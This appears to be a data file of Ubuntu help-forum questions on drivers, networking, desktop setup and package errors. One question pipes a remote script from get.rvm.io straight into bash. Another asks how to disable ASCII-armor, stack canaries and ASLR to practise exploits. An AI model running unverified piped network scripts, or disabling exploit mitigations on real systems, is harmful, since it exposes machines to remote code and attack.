476172	hciconfig features hex codes	i ca n't seem to find anywhere what the hex codes listed under hciconfig features stand for . does anyone know where i can find a list to show which feature corresponds to which hex code ? output : $ hciconfig -a hci0 features hci0 : type : br/edr bus : usb bd address : 00:0e:8e:49:38:9d acl mtu : 820:8 sco mtu : 255:16 features page 0 : 0xff 0xfb 0xff 0xfe 0xdb 0xff 0x7b 0x87 < 3-slot packets > < 5-slot packets > < encryption > < slot offset > < timing accuracy > < role switch > < hold mode > < sniff mode > < park state > < rssi > < sco link > < hv2 packets > < hv3 packets > < u-law log > < a-law log > < cvsd > < paging scheme > < power control > < transparent sco > < broadcast encrypt > < edr acl 2 mbps > < edr acl 3 mbps > < enhanced iscan > < interlaced iscan > < interlaced pscan > < inquiry with rssi > < extended sco > < ev4 packets > < ev5 packets > < afh cap . slave > < afh class . slave > < le support > < 3-slot edr acl > < 5-slot edr acl > < sniff subrating > < pause encryption > < afh cap . master > < afh class . master > < edr esco 2 mbps > < edr esco 3 mbps > < 3-slot edr esco > < extended inquiry > < le and br/edr > < simple pairing > < encapsulated pdu > < err . data report > < non-flush flag > < lsto > < inquiry tx power > < epc > < extended features > features page 1 : 0x07 0x00 0x00 0x00 0x00 0x00 0x00 0x00
476178	how do i install kde on ubuntu server ?	i have ubuntu 12.04.4 lts ( 64 bit ) server with no gui . can anyone tell me how do i install kde on it ? will that command be okay ? apt-get install kubuntu-desktop -y startx or something else has to be done ?
476181	how to tile window on the corners in xubuntu	after i realized that unity is overstretching my graphics card and my cpu , i decided to remain to ubuntu by switching to xubuntu . xubuntu is must faster , but i am now trying to reproduce the handy window handling behaviour with keyboard shortcuts , as it used to be done by compiz in unity . xubuntu 12.10 window tiling shortcuts explains how to enable this functionality for side-by-side or top-to-bottom tiling . but in order to fit 4 windows on the screen , i still need a shortcut for moving a window on the screen corner , like alt+ctrl+num used to be for unity .
476188	does ubuntu 14.04 use ascii-armor and how to turn it on/off ?	does ubuntu 14.04 use ascii-armor and how to turn it on/off ? the purpose is to test some exploit and knowing that would help , i 'm still in the learning process . i 'm already aware of the stack protector with canaries and aslr and how to turn them on/off in order to try some exploit techniques . is there other security policies that ubuntu 14.04 follow that i should be aware in my journey into security/exploit ? thank again for all the answers
476189	cvs autocomplete not working	'm running ubuntu 14.04 . when i 'm on the server via putty ( ssh ) , the autocomplete is not working for the `` cvs commit ... '' or `` cvs update ... '' , although for other commands like nano , it 's working fine . eg , when i 'm in a directory and try nano cvsd < > this is completed to cvsdir/ ( to be filled then with the actual filename of course ) however , when i 'm in the same location and try cvs commit cvsd < > nothing happens . it 's not completed . i tried in different locations ( for folders that are cvs folders ) , and it 's never working . when i type cvs commit cvsdir , it 's working as expected - the directory actually is a cvs directory . when i try `` cvs upd < > '' , this is completed to `` cvs update '' . i was looking at /etc/bash_completion.d/ , but not many files are there . i tried copying the `` cvs '' file from an old machine ( ubuntu 10.04.4 ) to that directory , but nothing changed . how an i ensure that the auto-complete works again for the cvs command ?
476192	usb recognized , but not usable	i booted my computer today and i do n't know what happened , but all my usb devices are n't working anymore ( webcam , mouse , keyboard , external drive ) . i can see them being connected through sudo lsusb , but ubuntu does n't let me use them . how do i get them back ? sudo lsusb bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 004 : id 05ac:129e apple , inc. ipod touch 4.gen bus 002 device 001 : id 1d6b:0001 linux foundation 2.0 root hub bus 004 device 002 : id 046d:08f0 logitech , inc , quickcam messenger bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 016 : id 093a:2510 pixart imaging , inc. optical mouse bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 009 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 008 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 007 device 001 : id 1d6b:0003 linux foundation 3.0 root hub bus 006 device 001 : id 1d6b:0002 linux foundation 2.0 root hub dmesg usb 3-5 : new low-speed usb device number 6 using ohci-pci usb 3-5 : new usb device found , idvendor=093a , idproduct=2510 usb 3-5 : new usb device strings : mfr=1 , product=2 , serialnumber=0 usb 3-5 : product : usb optical mouse usb 3-5 : manufacturer : pixart lsmod module size used by pata_acpi 13038 0 pata_atiixp 13271 1 ahci 25819 0 libahci 32168 1 ahci r8169 67581 0 mii 13934 1 r8169 lsblk name maj : min rm size ro type mountpoint sda 8:0 0 232.9g 0 disk sda1 8:1 0 167.7g 0 part /
476195	lo interface not coming up on boot ( upgrade fom 12lts to 14lts , work in container mode )	i am using the linux container , i upgraded from 12lts to 14lts recently , however after upgrade , the lo interface can not be start automatically , and here is `` ip link show '' 1 : lo : < loopback > mtu 65536 qdisc noop state down mode default group default link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00 2 : ip_vti0 @ none : < noarp > mtu 1500 qdisc noop state down mode default group default link/ipip 0.0.0.0 brd 0.0.0.0 3 : sit0 : < noarp > mtu 1480 qdisc noop state down mode default group default link/sit 0.0.0.0 brd 0.0.0.0 4 : ip6tnl0 : < noarp > mtu 1452 qdisc noop state down mode default group default link/tunnel6 : : brd : : 5 : ip6gre0 : < noarp > mtu 1448 qdisc noop state down mode default group default link/gre6 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 brd 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 the state of lo is down by default , when ifup lo , it says ifup : interface lo already configured i can only make lo workable if i type ifconfig lo 127.0.0.1 netmask 255.0.0.0 up , but this is a manual way , i need it to come up automatically on boot , is there any clues to fix this ? i had checked for long time and the configuration ( /etc/network/interfaces , etc ... ) i have no idea now , please suggest some way for me to fix this , thanks a lot .
476199	ubuntu 12.04 lts updating	ok , so i have n't upgraded to 14.04 yet . the update service has said nothing about a new lts and i 'm confused ... updates keep coming . some things are working just a little different . i 'm trying to deal with longstanding system projects so i 'm not tempted to upgrade quite yet . but should i ? are these piddly updates going to steer me wrong ? will ubuntu 12.04 lts just degrade and degrade an degrade ? why is n't update suggesting i go for the newer , brighter , shinier lts ? oh , and what is the meaning of life ? cecilieaux
476201	ubuntu 14.04 dvd playback stuttering	running into a problem playing dvd 's on 14.04 lts . i have installed all libs in various sections and do get the menus and initial menu videos to play however when the main movie plays the video become garbled . i also have a windows xp vm running under vmware player and it plays smooth with vlc so i do n't think this is a hardware problem . also have installed the lib-bluray stuff and keys ... vlc is caughing up many errors while the video plays . seems to be bad dvd decrypt keys somehow ? ? ubuntu 14.04 lts x64 vlc 2.2.0-git weatherwax dmesg for bluray player scsi 3:0:0:0 : cd-rom matshita bd-mlt uj265 1.00 pq : 0 ansi : 5 sr0 : scsi3-mmc drive : 62x/62x writer dvd-ram cd/rw xa/form2 cdda caddy cdrom : uniform cd-rom driver revision : 3.20 sr 3:0:0:0 : attached scsi cd-rom sr0 vlc errors during main movie playback : [ mpeg2video @ 0x7fb2ec055820 ] slice mismatch [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 37 11 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 21 12 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 3 13 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 3 14 [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 20 15 [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 14 16 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 28 18 [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 17 18 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 8 20 [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 7 21 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 17 22 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 1 23 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 14 25 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 4 26 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] invalid cbp at 23 0 [ mpeg2video @ 0x7fb2ec055820 ] slice mismatch [ mpeg2video @ 0x7fb2ec055820 ] slice mismatch [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 19 3 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] slice mismatch [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 5 7 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 10 8 [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 1 9 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] invalid cbp at 15 11 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 27 12 [ mpeg2video @ 0x7fb2ec055820 ] ac-tex damaged at 2 14 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 13 16 [ mpeg2video @ 0x7fb2ec055820 ] mb incr damaged [ mpeg2video @ 0x7fb2ec055820 ] invalid mb type in b frame at 7 18
476203	printing pdf files from firefox	got a brain teaser for everyone . : ) i recently needed to turn in paperwork for insurance reasons . i found the pdf file for the form i needed online , however it would not let me print the file . when viewing the file in firefox which is using the default viewer , i click the print button and click ok/print . the printer will just push out a blank page . if i save the file on my system and pull it up in any other pdf file viewer i can print the file without fail . not sure what is happening . my printer is connected to my pc and the ubuntu is connected to a wireless network which shares the printer on the pc . the printer should be setup properly because i can print from any other application and any other file type . not sure if this is normal or i am having a small issue . have tried changing a few settings but no help . i have put everything back to the default settings the way it was . anyone have any ideas ? not sure what else to do ... .
476204	unable to get a widget name by gtk.buildable.get_name ( obj )	i 'd like to show and hide some windows and logging their names . but i 'm unable to do it , so i printed some interesting facts : print gtk.buildable.get_name ( menuitem ) print menuitem.get_toplevel ( ) print gtk.buildable.get_name ( menuitem.get_toplevel ( ) ) -- - output -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - configurazione2_menuitem < window object at 0x7f81880e7280 ( gtkwindow at 0x15b9a40 ) > none so , as you can read , menuitem.get_toplevel ( ) is none : i 'm unable to hide the current window , because this one ca n't work : menuitem.get_toplevel ( ) .hide ( ) # hide_currentwindow
476206	is gimp supposed to do this ? hue question	i 'm trying out gimp as a photoshop alternative and it 's okay . but the hue tool is terrible . i try to strip out blues , but then it strips out some of the black as well . i see gimp gets a lot of praise , but this specific function is useless and nowhere close to photoshop . any idea why this is happening ? do i need to install anything extra ? i installed gimp 2.8.10 .
476209	desktop background after logging in ubuntu 12.04	i am new to ubuntu and i do n't know what to do in this problem . i wanted to completely uninstall python so i did sudo get-apt purge python in between this process i closed the terminal as i saw that all programs are being uninstalled . now after reboot i can only see a wallpaper at the background nothing else . no dashboard no graphics . i have researched on few webpages but i could n't find the related solution i dont know which important graphics software i uninstalled or else i have tried using sudo apt-get install compizconfig-settings-manager but it unables to fetch the files from mc.archive.ubuntu
476212	how to add a new hard drive to ubuntu ?	i installed ubuntu desktop 14.04 on my pc . i have bought a hard disk and added it to my pc . the computer does not recognize the new hard drive . how can i let my ubuntu use the new hdd i bought ?
476213	gnome taskbar on multiple monitors	using ubuntu 12.10 with gnome 3.6 i have plugged in a second monitor to my laptop and can drag windows between . i am using compiz to handle virtual desktops and have switched that to scroll desktops at the same time . how can i show the taskbar on both monitors , and only the windows on that monitor show on that taskbar ? for bonus points can i set it so that when i plug in my number of desktops decreases - i no longer need to have 2x horizontally , just vertically . if i unplug i 'd like the second screen to switch to desktops 2 and 4 respectively .
476215	can i reduce the pixel size on my vnc window ?	a little hard to explain this , but i am wondering if i can create a miniature vnc window so that it 's less visible to people looking over my shoulder . ideally , this would retain the same pixel size but act much like my android screen does when i 'm using vnc on it ... only this would be on the pc , lubuntu 12.04 . i know i can shrink the window size and scroll to the right or left . but the text and images within the window are still the same size . i would like to have everything smaller ... as if it 's been shrunk by 2/3rds . thank you and again , apologies for the vagueness of this question ... i do n't exactly know how to describe it well .
476218	windows key shortcuts	is there a plugin that will give me the same directional key shortcuts as with windows 7 ? basically , if you hold the windows key and tap a direction , the active window changes to a side , top , bottom of full-screen orientation - very useful when stacking windows side by side . i really miss this function as well as a few others and would love to use them in ubuntu . thanks ,
476219	how would you tail a file then pass the data to a socket ?	i do n't want to re-invent the wheel . i need a program or series of commands to tail a log file , then send the lines to a socket on another machine . it 's for centralized log monitoring . something that can have a automated startup . i 'm going to write one if one does n't exist .
476220	migrating ubuntu system to a different machine	i wish to migrate my ubuntu system , the source system to an existing ubuntu system , the target system . they run 12.04 and 14.04 respectively . basically , i want all ( or most if that is the best we can do ) of the programs that i have installed on my system to be available on the existing ubuntu system . most programs i have downloaded are from apt-get but i have built some programs from source . i do n't really care too much about custom settings . what makes my question different from other [ questions ] [ 1 ] is that i want the target system to keep its programs . the solutions i have seen do a dpkg clear-selections on the target system , which will mark all packages that are not critical to deinstall . hence , all programs on the target system will be removed upon dselect upgrade . i am being cautious and asking on this site because i do not want to delete everything on my target system . is the following a valid solution : get a list of installed programs from the source system generate a list of the diff of the programs installed on the target system with the source system install the list from the previous step on the target system .
476221	ubuntu 14.04 + nvidia	i 've got an asus x552cl with a nvidia 710m with the recommended drivers installed ( on software & updates - additional drivers - nvidia 331.38 ( proprietary , tested ) ) . the problem is if i select the nvidia gpu ( on the x server settings ) if frequently freezes after some time . not even the mouse moves . i 've got to put the laptop to sleep ( just close the screen ) and wake it up again , and it 's good for some minutes . this does n't happen with the intel gpu , but that 's just too weak . i 've seen some similar problems around here , but the solution usually is installing the proprietary tested drivers , which i already use . can anyone help ? thanks
476224	14.04 2nd hdd ca n't change permisions	hi there i 'm new to linux and ubuntu and iv'e just put in a 2nd hdd , i also have a ssd as my main drive . but i cant change the permission to allow me to place anything into the new 2nd hdd , please help iv'e looked on-line at other peoples posts but everything i try is to no end .
476225	how can i decrease the volume increment in 14.04 ?	i know that this has already been asked a lot , but all solutions that i found are old , pre - unity . so , i am asking again : how can i decrease the sound increment ( or decrement ) that happens when the mouse wheel is scrolled , if the cursor is hovering over the volume bar ( like shown below ) ?
476228	a software for adjusting touch screen options	i am using a laptop with a touch-screen , and i am looking for a software that will allow me to customize the touch screen options . for example , i want firefox to scroll down when i 'm touching the screen and drag my finger up ( like in laptops with windows 8 ) . is there any program that allows me to do that ? thank for answering !
476233	how to include environment variable in launcher for icon	this is an extension to the question how to include an environment variable in the launcher ? . this question explains how to use the environment variable for the exec part of the .desktop file but not the icon an example : [ desktop entry ] name=my application name comment=a comment exec=sh -c ' $ home/.bin/path/to/bin' icon= $ home/.bin/path/to/icon this launcher will work but the icon is not shown . i ca n't use something like icon=sh -c ' $ home/.bin/path/to/icon' for the icon ... what to do instead ?
476234	multi touch gesture in ubuntu 14.04 not working	i have newly installed ubuntu 14.04 . my two finger scrolling is working fine but 3 finger gestures like forward/backward , changing tabs , etc are not working which works in windows . is there any way to enable that . thanks
476237	remmina connection issue to windows server 2012r2 after windows update	i am using ubuntu 14.04 and remmina to connect to a windows server 2012r2 computer . i am being prompted for my password and put it in successfully , but fail to login to the server . i was able to connect prior to a set of windows updates . what can i do to resolve the issue and connect to the server ?
476239	setting up multiple network interfaces	i 'm trying to setup ubuntu cloud , while setting up maas i have a simple problem , i have 2 network interfaces , eth0 and eth1 , eth0 is to connect the cluster to the internet through my router , and eth1 is to manage the cluster , after auto configuration of eth0 how would i go about adding eth1 , having dhcp & dns as well ? ~thanks
476242	pasting larger blocks of text into chrome 35 and chromium does n't work on ubuntu 14.04	ubuntu 14.04 chrome version : 35.0.1916.114 chrome beta version : version 36.0.1985.32 beta chromium version : 34.0.1847.116 ubuntu 14.04 aura ( 260972 ) i have noticed that there seems to be a limit of the amount of text / data i can copy and paste into chrome/chromium . for example i have an open office spreadsheet with a 100+ rows and 10 columns . i can copy and paste 50 rows just fine into a google doc but when i try the full 100 rows it does n't work . i 've also noticed this in using wordpress i 'll write some of my content first in an open office document and then try to paste it into wordpress and that does n't work in chrome or chromium . pasting works just fine inside of firefox .
476246	when i use zsh , how do i set path in /etc/profile.d ?	i 'm using zsh as my shell , and i 'm trying to configure my environment . i usually define my $ java_home variable by creating a file : /etc/profile.d/java.sh with the following content export java_home=/path/to/jdk export path= $ java_home/bin : $ path then i logout and back in , and it all works , but for some reason the path variable is not set . it recognizes java_home , but not the new path , see this terminal snippet : ~ echo $ java_home /usr/lib/jvm/jdk1.8.0_05 ~ echo $ path /usr/local/sbin : /usr/local/bin : /usr/sbin : /usr/bin : /sbin : /bin : /usr/games : /usr/local/games and i confirmed it by trying to run a command form the jvm ~ java -version zsh : command not found : java the path does n't include the $ java_home as it should . is there something else i should check ? i have checked that if i run : source /etc/profile.d/java.sh it all runs correctly and my variables get set as they should , but should n't the scripts in /etc/profile.d run automatically ?
476247	how to recover my xubuntu from grub running on vmware ?	i am using xubuntu 12.04 on vmware . when i boot , grub shows up and so i tried to find some way to recover my xubuntu from grub . while looking for it , i found this . i suppose it will resolve my problem , but i am getting stuck at the fourth step there which is shown below : - does this mean that xubuntu must have .iso file in the file system ? if so , is there any other way to fix this problem ?
476249	in xubuntu there are black unreadable tabs in gtk applications such as gedit	i 'm using xfce in ubuntu 14.04 . when i open gedit , the tabs at the top are unreadable : having done some research , it appears that this is because gedit is a gtk 2.0 application and this problem manifests itself if the theme you are using does not have specific workarounds in it for gtk 2.0 applications . here is what i have tried so far : this forum thread seems to indicate that using the greybird theme would solve the problem . the above screenshot was taken with greybird , and it did not solve the problem . this appears to be the same problem asked on stackoverflow . none of the answers are very helpful . this is a similar question asked here but the solution presented is for tabs that are very dark but not black : http : //i.stack.imgur.com/mgjqe.png this forum thread suggest creating a configuration file for a fallback theme for gtk 2.0 applications . creating this configuration file did not solve my problem .
476250	extremely slow wireless on ubuntu 14.04	i am facing extremely slow wireless connection on ubuntu 14.04 . also the connection is sporadic . please help me with this . also , if there is any more information needed do let me know .
476254	error installing rvm	i am following this guide , but this is the output i receive . what am the problem ? dbugger @ mercury : ~ $ \curl -ssl https : //get.rvm.io | bash -s stable -- rails downloading https : //github.com/wayneeseguin/rvm/archive/stable.tar.gz upgrading the rvm installation in /home/dbugger/.rvm/ rvm path line found in /home/dbugger/.profile /home/dbugger/.bashrc /home/dbugger/.zshrc . rvm sourcing line found in /home/dbugger/.bash_profile /home/dbugger/.zlogin . upgrade of rvm in /home/dbugger/.rvm/ is complete . # enrique , # # thank you for using rvm ! # we sincerely hope that rvm helps to make your life easier and more enjoyable ! ! ! # # ~wayne , michal & team . in case of problems : http : //rvm.io/help and https : //twitter.com/rvm_io upgrade notes : * no new notes to display . rvm 1.25.27 ( stable ) by wayne e. seguin < wayneeseguin @ gmail.com > , michal papis < mpapis @ gmail.com > [ https : //rvm.io/ ] searching for binary rubies , this might take some time . no binary rubies available for : ubuntu/14.04/x86_64/ruby-2.1.2 . continuing with compilation . please read 'rvm help mount ' to get more information on binary rubies . checking requirements for ubuntu . installing requirements for ubuntu . updating system ... ... ... . installing required packages : gawk , libreadline6-dev , libssl-dev , libyaml-dev , libsqlite3-dev , sqlite3 ... . error running 'requirements_debian_libs_install gawk libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 ' , showing last 15 lines of /home/dbugger/.rvm/log/1401804140_ruby-2.1.2/package_install_gawk_libreadline6-dev_libssl-dev_libyaml-dev_libsqlite3-dev_sqlite3.log ++ /scripts/functions/utility : __rvm_try_sudo ( ) 405 > sudo -p ' % p password required for '\ '' apt-get -- no-install-recommends -- yes install gawk libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3'\ '' : ' apt-get -- no-install-recommends -- yes install gawk libreadline6-dev libssl-dev libyaml-dev libsqlite3-dev sqlite3 reading package lists ... building dependency tree ... reading state information ... some packages could not be installed . this may mean that you have requested an impossible situation or if you are using the unstable distribution that some required packages have not yet been created or been moved out of incoming . the following information may help to resolve the situation : the following packages have unmet dependencies : libssl-dev : depends : libssl1.0.0 ( = 1.0.1f-1ubuntu2 ) but 1.0.1f-1ubuntu2.1 is to be installed e : unable to correct problems , you have held broken packages . ++ /scripts/functions/utility : __rvm_try_sudo ( ) 405 > return 100 ++ /scripts/functions/requirements/ubuntu : requirements_debian_libs_install ( ) 36 > return 100 requirements installation failed with status : 100 .
476255	hd videos slow motion on sm player in ubuntu 14.04	it shows this message : /usr/bin/mplayer -noquiet -nofs -nomouseinput -sub-fuzziness 2 -identify -slave -vo xv , -ao pulse -nokeepaspect -nodr -double -input nodefault-bindings : conf=/dev/null -stop-xscreensaver -wid 79691829 -monitorpixelaspect 1 -ass -embeddedfonts -ass-line-spacing 0 -ass-font-scale 1 -ass-styles /home/shahmonly/.config/smplayer/styles.ass -font kacstone -subfont-autoscale 0 -subfont-text-scale 45 -subcp cp1256 -vid 0 -aid 0 -subpos 100 -volume 99 -cache 2048 -osdlevel 0 -vf-add screenshot -noslices -channels 2 -af scaletempo , equalizer=0:0:0:0:0:0:0:0:0:0 -softvol -softvol-max 110 /home/shahmonly/videos/movies/horror/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki.mkv mplayer2 2.0-701-gd4c5b7f-2ubuntu2 ( c ) 2000-2012 mplayer team terminal type `unknown ' is not defined . playing /home/shahmonly/videos/movies/horror/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki.mkv . cache size set to 2048 kib cache fill : 0.00 % ( 0 bytes ) [ mkv ] expected element not found id_video_id=0 [ mkv ] track id 1 : video ( v_mpeg4/iso/avc ) , -vid 0 id_audio_id=0 id_aid_0_lang=und [ mkv ] track id 2 : audio ( a_dts ) , -aid 0 , -alang und [ mkv ] will play video track 1 . detected file format : matroska load subtitles in /home/shahmonly/videos/movies/horror/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki/ id_file_sub_id=0 id_file_sub_filename=/home/shahmonly/videos/movies/horror/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki/sub.srt sub : added subtitle file ( 1 ) : /home/shahmonly/videos/movies/horror/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki/sub.srt id_filename=/home/shahmonly/videos/movies/horror/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki/drag.me.to.hell.2009.bluray.720p.x264.dts-wiki.mkv id_demuxer=mkv id_video_format=avc1 id_video_bitrate=0 id_video_width=1280 id_video_height=534 id_video_fps=23.976 id_video_aspect=2.3970 id_audio_format=8193 id_audio_bitrate=0 id_audio_rate=48000 id_audio_nch=6 id_start_time=0.00 id_length=5931.67 id_seekable=1 id_chapters=0 [ ass ] auto-open opening video filter : [ screenshot ] selected video codec : h.264 / avc / mpeg-4 avc / mpeg-4 part 10 [ libavcodec ] id_video_codec=ffh264 selected audio codec : dca ( dts coherent acoustics ) [ libavcodec ] audio : 48000 hz , 2 ch , floatle , 1536.0 kbit/50.00 % ( ratio : 192000- > 384000 ) id_audio_bitrate=1536000 id_audio_rate=48000 id_audio_nch=2 ao : [ pulse ] 48000hz 2ch floatle ( 4 bytes per sample ) id_audio_codec=ffdca [ mixer ] no hardware mixing , inserting volume filter . starting playback ... video : 1280x534 23.976 fps 0.0 kbps ( 0.0 kb/s ) id_video_aspect=2.3970 vo : [ xv ] 1280x534 = > 1280x534 planar yv12 [ ass ] playresx undefined , setting to 384 [ ass ] glyph 0x4b not found , selecting one more font for ( kacstone , 80 , 0 ) [ ass ] fontconfig : selected font is not the requested one : 'dejavu sans ' ! = 'kacstone'
476256	scheduled shutdown with gnome-scheduler - how to enter root psw	i am trying to schedule my ubuntu 14 server to shutdown every evening at 12:01 using the /sbin/poweroff . since you need root to shutdown the command does n't work . if i put 'sudo ' in front of the command it will prompt for the password but i am not on the server then so i can not enter it . how can i schedule a shutdown using gnome-scheduler so it enters the password automatically ?
476257	couldnt find a way to open blender software	i am new to ubuntu . i downloaded the latest version of blender ( 2.70a ) from official blender.org site as an tar.bz2 file . my ubuntu os is 14.04 lts amd64 bit os , and i am sure that i have downloaded the correct version of blender . i have read that for security reasons , ubuntu does not allow executing exe files . since the downloaded package contains blender as an executable/x-executable type , it is not able to execute . i do not have an internet connection in that computer too . also the `` allow executing file as program '' checkbox is checked by default . still double clicking it does not execute the file . can anyone say how to open this file ? p.s : wine also checked but requires active internet connection , which i dont have .
476258	unfamiliar codes in iw	recently i am trying to understand how the codes in iw works . in iw.h , i encountered the following : # define __command ( sect , name , args , nlcmd , flags , idby , handler ) \ static const struct cmd __cmd_ # # handler # # nlcmd # # idby \ __attribute__ ( ( used ) ) __attribute__ ( ( section ( `` __cmd '' ) ) ) \ = { sect , name , args , nlcmd , flags , idby , handler } # define command ( section , name , args , cmd , flags , idby , handler ) \ __command ( # section , # name , args , cmd , flags , idby , handler ) # define toplevel ( name , args , cmd , flags , idby , handler ) \ __command ( null , # name , args , cmd , flags , idby , handler ) extern struct cmd __start___cmd ; extern struct cmd __stop___cmd ; i tried some searching on google but can only understand that `` __start___cmd '' and `` __stop___cmd '' are generated by linker . is there any more layman 's explanation to this ? the __command defined was not used in the codes and i have no idea what is the purpose served . i can only assume that it is related to the extern struct defined . i downloaded the source code from https : //www.kernel.org/pub/software/network/iw/iw-0.9.1.tar.gz
476259	macbook pro 7.1 wireless ( bcm4322 ) and kubuntu 14.04 - no firmware works	i desperately need some help ( maybe not desperately , but this is frustrating ! ) . i have a macbook pro 7.1 with a broadcom bcm4322 wireless card . i have tried , and tried , and tried to get it working but it refuses to cooperate . i 've searched here and nothing i 've found works . currently i have loaded bcmwl-kernel-source ( as you will see in the pastebin link ) but that does n't work . the most interesting thing is that i got it to work with no problems on lubuntu 14.04 using firmware-b43-installer . here 's what i 've tried ( repeatedly ) : bcmwl-kernel-source b43-fwcutter & firmware-b43-installer linux-firmware-nonfree i 've tried each individually , and various combinations of the three ( i know that wo n't work , but i thought just maybe ) . anyway , i ran the wireless-info script and the output is here . thank you so , so much for your help ! quick specs : kubuntu 14.04 ( 3.13.0-27-generic # 50-ubuntu smp thu may 15 18:06:16 utc 2014 x86_64 x86_64 x86_64 gnu/linux ) broadcom bcm4322 even tried wicd instead of network-manager ( did n't help ) edit : reinstalled linux-firmware-nonfree and now the computer scans for wireless networks , but does not connect . posted new output of wireless-info . maybe the following is important : [ 657.716057 ] wlan0 : authenticate with [ 657.744251 ] wlan0 : send auth to ( try 1/3 ) [ 657.746953 ] wlan0 : authenticated [ 662.752366 ] wlan0 : deauthenticating from by local choice ( reason=3 )
476260	ubuntu server can not access internet	i have a problem that i have been working for 2 days now and had tried various troubleshooting techniques but have yet to find a solution . so to my problem ... . i have a ubuntu server . was working fine then i installed dhcp server , even before i configured it the server could not access the internet . access inside the lan is available but not anything outside the lan . please help ? # azkerm here it is ping 8.8.8.8 ( 8.8.8.8 ) 56 ( 84 ) bytes of data . from 192.168.2.34 icmp_seq=1 destination host unreachable from 192.168.2.34 icmp_seq=2 destination host unreachable from 192.168.2.34 icmp_seq=3 destination host unreachable kernel ip routing table destination gateway genmask flags metric ref use iface 0.0.0.0 192.168.2.1 0.0.0.0 ug 0 0 0 eth0 0.0.0.0 192.168.2.1 0.0.0.0 ug 100 0 0 br0 169.254.0.0 0.0.0.0 255.255.0.0 u 1000 0 0 br0 192.168.2.0 0.0.0.0 255.255.255.0 u 0 0 0 br0 192.168.2.0 0.0.0.0 255.255.255.0 u 1 0 0 eth0 192.168.122.0 0.0.0.0 255.255.255.0 u 0 0 0 virbr0 cat /etc/resolv.conf generated by networkmanager domain miracledc search miracledc nameserver 192.168.2.3
476263	create bootable disk of os x mavericks with ubuntu	is there a graphical method to create a bootable disk of mac os x 10.9 from ubuntu . i found one method : `` http : //www.insanelymac.com/forum/topic/293168-guide-how-to-make-a-bootable-os-x-109-mavericks-usb-install-drive-on-linux/ '' ( but it is with command line ) . some help would be appreciated .
476264	ssh with openpgp smart card	i had some problems using ssh with openpgp smart card . when i try ssh user [ at ] adress , i am facing the error of permission denied ( publickey ) . can anyone help with these issues . kind regards ,
476265	how can an application installed via wine be enabled to access ntfs partitions automatically and quickly ?	i am quite new to ubuntu . i have found the solution that comes closest to my above-mentioned problem in the admirable answers to the question `` why can an application installed using wine not access ntfs partitions ? '' the procedure as i have understood from those answers is as follows : mount the desired partition . go to wine configuration , then to 'drives ' , click 'z : ' , then 'browse ' , click '+ ' beside 'media ' , then '+ ' beside your user name , and you find your desired partition . this works . now my question is : is there any way to automate and shorten the process ? one of the answers there says i can add drive letters to point directly to it . maybe this contains the answer i am looking for but , if so , will someone please explain it more fully ?
476266	wacom touch device ( call for suggestion of compatibility )	i need to use a touch `` mouse '' on my desktop pc , witch work with ubuntu 12.04 lts ... theoretically wacom tablet should be linux compatible , but practically blogs are plenty of people that suffers problem of installation . so my question is : `` there are any wacom touch devices realy plug and play ? '' without go to edit xorg configuration and stuff like that ... if some one want report him experience of `` easy '' installation , i will report it in the wacom forum ... please , specify : wacom device model . ubuntu ( or other linux ) version . procedure followed for installation . tanks a lot !
